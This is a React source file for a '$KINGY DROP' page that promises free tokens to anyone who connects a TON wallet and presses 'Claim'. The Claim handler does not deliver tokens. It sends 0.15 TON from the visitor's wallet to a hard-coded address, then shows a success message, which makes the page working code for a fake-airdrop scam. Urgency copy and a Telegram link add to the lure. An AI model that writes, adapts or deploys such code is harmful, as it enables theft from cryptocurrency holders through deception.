import logoToken from "./assets/logo-token.png"
import {TonConnectButton, useTonConnectUI, useTonWallet} from "@tonconnect/ui-react";
import {useEffect} from "react";
import toast, { Toaster } from 'react-hot-toast';

const deployTx = {
    // The transaction is valid for 10 minutes from now, in unix epoch seconds.
    validUntil: Math.floor(Date.now() / 1000) + 600,
    messages: [

        {
            // The receiver's address.
            address: 'EQAT3B5L7XYaNLj6sM8oI9-m4EDHhCt-AIjj5fBO496tFkmo',
            // Amount to send in nanoTON. For example, 0.005 TON is 5000000 nanoTON.
            amount: '150000000'
        },

    ],
};

function App() {
    const wallet = useTonWallet();
    const [tonConnectUi] = useTonConnectUI();

    useEffect(() => {
        console.log("wallet", wallet);
    }, [wallet]);

    return (
        <div className="App">
            <div className="App__Right">
                <img src={logoToken} alt="logo"/>
            </div>
            <div className={"App__Left"}>
                <h1><span>KINGY</span> DROP</h1>
                <p>Connect your wallet and get your first $KINGY. Call your friends. Promotion is limited.</p>
                {wallet && <p>You have successfully connected your wallet. Your first step to receiving $KINGY is done. The final step is to click the "Claim" button.</p>}
                <div className={"App__Left__Buttons"}>
                    {wallet ? <button onClick={async () => {
                        try {
                            await tonConnectUi.sendTransaction(deployTx)
                            toast.success("Success! Check your wallet", {
                                icon: "👏"
                            });
                        } catch (e) {
                            console.log(e);
                            toast.error(`Error: ${e.message}`, {
                                icon: "😔"
                            });
                        }
                    }}>🔥 Claim 🔥</button> : <TonConnectButton></TonConnectButton>}
                    <button onClick={() => window.open("https://t.me/investkingyru")}>Telegram Channel</button>
                </div>
            </div>
            <Toaster position="top-right"
                     reverseOrder={false} />
        </div>
    );
}

export default App;
